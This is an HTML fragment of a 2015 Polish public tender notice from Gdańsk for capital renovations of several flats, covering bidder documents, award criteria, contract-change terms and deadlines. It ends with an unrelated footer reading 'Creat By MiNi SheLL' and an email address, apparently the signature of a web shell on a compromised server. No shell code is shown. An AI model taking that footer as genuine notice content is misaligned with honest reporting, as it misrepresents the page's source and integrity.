<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Złożyć Druk OFERTA, który należy sporządzić wg wzoru druku Zamawiającego.<br>
2. Podać w złożonej ofercie części zamówienia, których wykonanie zamierza powierzyć podwykonawcy lub nazwy podwykonawców, na których zasoby wykonawca powołuje się, w celu wykazania spełnienia warunku udziału w postępowaniu. W przypadku nie wskazania podwykonawców, zamawiający uzna, że całość zamówienia będzie wykonywana przez Wykonawcę osobiście.<br>
3. Podać w złożonej ofercie termin realizacji zamówienia w dniach, oddzielnie dla poszczególnych części. Maksymalny termin wykonania zamówienia musi wynosić 80 dni. Nie spełnienie tego wymogu spowoduje odrzucenie oferty.<br>
4. Udzielić gwarancji jakości na okres co najmniej 36 miesięcy od daty odbioru końcowego. Zamawiający zrównuje okres rękojmi z okresem gwarancji. Nie spełnienie tego wymogu spowoduje odrzucenie oferty.<br>
5. Załączyć kopię dowodu wpłaty wadium wpłaconego w pieniądzu lub oryginał albo kopię wadium wniesionego w jednej z form określonych w Rozdziale XIII SIWZ.<br>
6. Wykazać, że oferta została podpisana przez osobę(y) uprawnioną(e) do występowania w imieniu i na rzecz Wykonawcy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.80</li>
<li>2 - Termin wykonania zamówienia - 0.20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje, że strony mogą wprowadzić następujące zmiany do umowy:<br>
1.1. Następujące postanowienia umów mogą ulec zmianie:<br>
a) przesunięciu może ulec termin wykonania przedmiotu zamówienia,<br>
b) przesunięciu może ulec termin wykonania przedmiotu zamówienia dotyczący realizacji robót remontowych lokalu mieszkalnego nr 5 przy ul. Św. Ducha 79/81,<br>
c) przesunięciu może ulec termin wykonania przedmiotu zamówienia dotyczący realizacji robót remontowych pozostałych lokali mieszkalnych,<br>
d) zmianie może ulec osoba Kierownika Budowy lub kierowników robót, jako przedstawicieli Wykonawcy pod warunkiem wcześniejszego powiadomienia Zamawiającego o tym fakcie,  <br>
e) zmiana lub rezygnacja z podwykonawcy, na którego zasoby wykonawca powoływał się na zasadach określonych w art. 26 ust. 2b ustawy prawo zamówień publicznych, w celu wykazania spełniania warunków udziału w postępowaniu,<br>
f) możliwość realizacji umowy przez podwykonawców (zawarcie umów o podwykonawstwo) na etapie jej realizacji, w przypadku braku zadeklarowania realizacji zamówienia przy pomocy podwykonawców na etapie składania ofert,<br>
g) zmiany umowy korzystne dla Zamawiającego.<br>
1.2. Zmiany w umowie mogą zostać wprowadzone przy zaistnieniu następujących okoliczności:<br>
1. Termin może ulec przesunięciu w następujących przypadkach:<br>
a) na skutek działania siły wyższej,<br>
b) wstrzymania robót przez Zamawiającego lub przerwy w wykonywaniu robót powstałych na skutek okoliczności, za które ponosi odpowiedzialność Zamawiający.<br>
2. W przypadku wystąpienia z okoliczności wymienionych w ppkt a) i b) punktu 1 wymaga ona pisemnego potwierdzenia przez Przedstawiciela Zamawiającego. Po ustąpieniu przeszkody w prowadzeniu robót, o której mowa powyżej, w przypadku ustalenia, że w/w przeszkoda w wykonywaniu umowy wpłynie na termin realizacji umowy albo na terminy wykonania poszczególnych etapów, Strony ustalą nowe terminy wykonania, z zastrzeżeniem, że termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia robót budowlanych w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.<br>
3. Termin realizacji robót remontowych lokalu mieszkalnego nr 5 przy ul. Św. Ducha 79/81 może ulec przesunięciu w przypadku przekazania Wykonawcy przez Zamawiającego prawomocnego pozwolenia na budowę dla tego lokalu po podpisaniu umowy, o ilość dni opóźnienia w jego przekazaniu.<br>
4. Termin realizacji robót remontowych pozostałych lokali mieszkalnych może ulec przesunięciu w przypadku opóźnień mogących powstać w toku wydawania decyzji przez organy administracji budowlanej w związku z realizowanymi robotami. W tym przypadku termin realizacji będzie liczony od dnia umożliwiającego ich realizację zgodnie z przepisami prawa.<br>
5. Zmiana osoby Kierownika Budowy lub kierowników robót może nastąpić z przyczyn losowych, niezależnych od Zamawiającego i Wykonawcy np. śmierci, choroby lub w przypadku rozwiązania przez Wykonawcę umowy z Kierownikiem Budowy lub kierownikami robót, itp. Zamawiający zaakceptuje zmianę kierownika budowy lub kierownika robót, gdy kwalifikacje i doświadczenie wskazanej osoby będą spełniać warunki postawione w tym zakresie w specyfikacji istotnych warunków zamówienia.<br>
6. Zmiana lub rezygnacja z podwykonawcy, na którego zasoby wykonawca powoływał się na zasadach określonych w art. 26 ust. 2b ustawy prawo zamówień publicznych, w celu wykazania spełniania warunków udziału w postępowaniu jest możliwa w przypadku wykazania przez wykonawcę, iż proponowany inny podwykonawca (lub wykonawca samodzielnie) spełnia dany warunek udziału w postępowaniu w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.<br>
7. Realizacja umowy przez podwykonawców (zawarcie umów o podwykonawstwo) na etapie jej wykonywania w przypadku braku zadeklarowania przeprowadzenia zamówienia przy pomocy podwykonawców na etapie składania ofert jest możliwa, pod warunkiem uzyskania zgody Zamawiającego i jeżeli w stosunku do części zamówienia, na którą ma być zawarta umowa o podwykonawstwo nie została wyłączona dopuszczalność podwykonawstwa.<br>
8. Zmiana umowy na korzyść Zamawiającego może być dokonana tylko za zgodą obu stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gisgdansk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 80-247 Gdańsk, ul Sobótki 9, sekretariat w godz. 9:00 - 14:00. Cena brutto - 36,90 PLN.<br>
Warunki i sposób płatności: przelew, gotówka, zaliczenie pocztowe..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.02.2015 godzina 15:00, miejsce: siedziba Zamawiającego, 80-247 Gdańsk, ul. Sobótki 9, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 24.03.2015.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> DATA, GODZINA I MIEJSCE OTWARCIA OFERT: 23.02.2015 r. godzina 15:15,<br> miejsce - siedziba Zamawiającego, 80-247 Gdańsk, ul. Sobótki 9, sekretariat.<br>
OSOBY UPRAWNIONE DO POROZUMIEWANIA SIĘ Z WYKONAWCAMI:<br>
Maciej Gwiazda, tel. 58 520 80 70,<br>
Adres poczty elektronicznej: gwiazda@gisgdansk.pl<br>
ZASADY WYKLUCZENIA WYKONAWCY<br>
Z postępowania o udzielenie zamówienia Zamawiający wykluczy również wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych.<br>
Zamawiający nie wykluczy z postępowania o udzielenie zamówienia publicznego wykonawcy, który udowodnił, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mając zapobiec zawinionemu i poważnemu naruszeniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie remontów kapitalnych 3 lokali mieszkalnych położonych przy ulicy Św. Ducha.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie remontów kapitalnych 3 lokali mieszkalnych położonych przy:<br>
a) ul. Św. Ducha 31A/35 m 10 o powierzchni użytkowej 27,09 m2,<br>
b) ul. Św. Ducha 31A/35 m 13 o powierzchni użytkowej 15,69 m2,<br>
c) ul. Św. Ducha 79/81 m 5 o powierzchni użytkowej 35,75 m2.<br>
Szczegółowy zakres robót dla każdego lokalu mieszkalnego określony jest w Projektach aranżacji lokalu mieszkalnego dla poszczególnych lokali.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.00.00-1, 45.22.32.10-1, 45.31.00.00-3, 45.31.43.10-7, 45.33.00.00-9, 45.33.11.00-7, 45.40.00.00-1, 45.41.00.00-4, 45.42.10.00-4, 45.42.11.46-9, 45.42.11.52-4, 45.43.11.00-8, 45.43.12.00-9, 45.43.21.14-6, 45.43.22.20-2, 45.44.21.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 80.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.80</li>
<li>2. Termin wykonania zamówienia - 0.20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie remontów kapitalnych 2 lokali mieszkalnych położonych przy ulicy Św. Ducha i Złotników.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie remontów kapitalnych 2 lokali mieszkalnych położonych przy:<br>
a) ul. Św. Ducha 44/46 m 1 o powierzchni użytkowej 22,24 m2,<br>
b) ul. Złotników 28/29 m 17 o powierzchni użytkowej 31,75 m2.<br>
Szczegółowy zakres robót dla każdego lokalu mieszkalnego określony jest w Projektach aranżacji lokalu mieszkalnego dla poszczególnych lokali.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.00.00-1, 45.22.32.10-1, 45.31.00.00-3, 45.31.43.10-7, 45.33.00.00-9, 45.33.11.00-7, 45.40.00.00-1, 45.41.00.00-4, 45.42.10.00-4, 45.42.11.46-9, 45.42.11.52-4, 45.43.11.00-8, 45.43.12.00-9, 45.43.21.14-6, 45.43.22.20-2, 45.44.21.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 80.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.80</li>
<li>2. Termin wykonania zamówienia - 0.20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com